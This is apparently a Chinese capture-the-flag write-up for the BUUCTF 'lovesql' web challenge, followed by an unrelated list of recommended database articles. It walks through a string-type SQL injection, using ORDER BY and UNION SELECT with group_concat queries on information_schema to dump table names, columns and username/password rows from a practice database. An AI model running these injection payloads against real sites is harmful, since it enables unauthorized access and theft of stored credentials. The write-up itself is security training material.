47,【5】BUUCTF web lovesql

进入靶场

可知是单引号闭合,属于字符串型注入

则后续方法与字符串型无异

使用order by 判断出字节数为3

使用union select寻找注入点时切记第一个select为空

库名geek

表名group_concat(table_name) from information_schema.tables where table_schema='geek'#

geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同

查询字段内容

group_concat(id,username,password) from geek.l0ve1ysq1#

group_concat(id,username,password) from geek.geekuser#

得到flag

笔记

1,本题考查字符串类型的注入

2,group_concat(id,username,password) from geek.geekuser#

一次可以爆出表格所有内容

相关推荐
l1t4 小时前
利用DeepSeek实现服务器客户端模式的DuckDB原型
服务器·c语言·数据库·人工智能·postgresql·协议·duckdb
MarkHard1238 小时前
如何利用redis使用一个滑动窗口限流
数据库·redis·缓存
island13149 小时前
【Redis#10】渐进式遍历 | 数据库管理 | redis_cli | RES
数据库·redis·bootstrap
心想事成的幸运大王9 小时前
Redis的过期策略
数据库·redis·缓存
倔强的石头_9 小时前
CentOS 上安装KingbaseES(ISO包)详细教程
数据库
2401_8979300610 小时前
使用Docker轻松部署Neo4j图数据库
数据库·docker·neo4j
诗句藏于尽头10 小时前
Django模型与数据库表映射的两种方式
数据库·python·django
寻星探路11 小时前
数据库造神计划第六天---增删改查(CRUD)(2)
java·大数据·数据库
盖世英雄酱5813612 小时前
Read timed out问题 排查
java·数据库·后端
云动雨颤13 小时前
Spring Boot配置优化:Tomcat+数据库+缓存+日志,全场景教程
数据库·spring boot·tomcat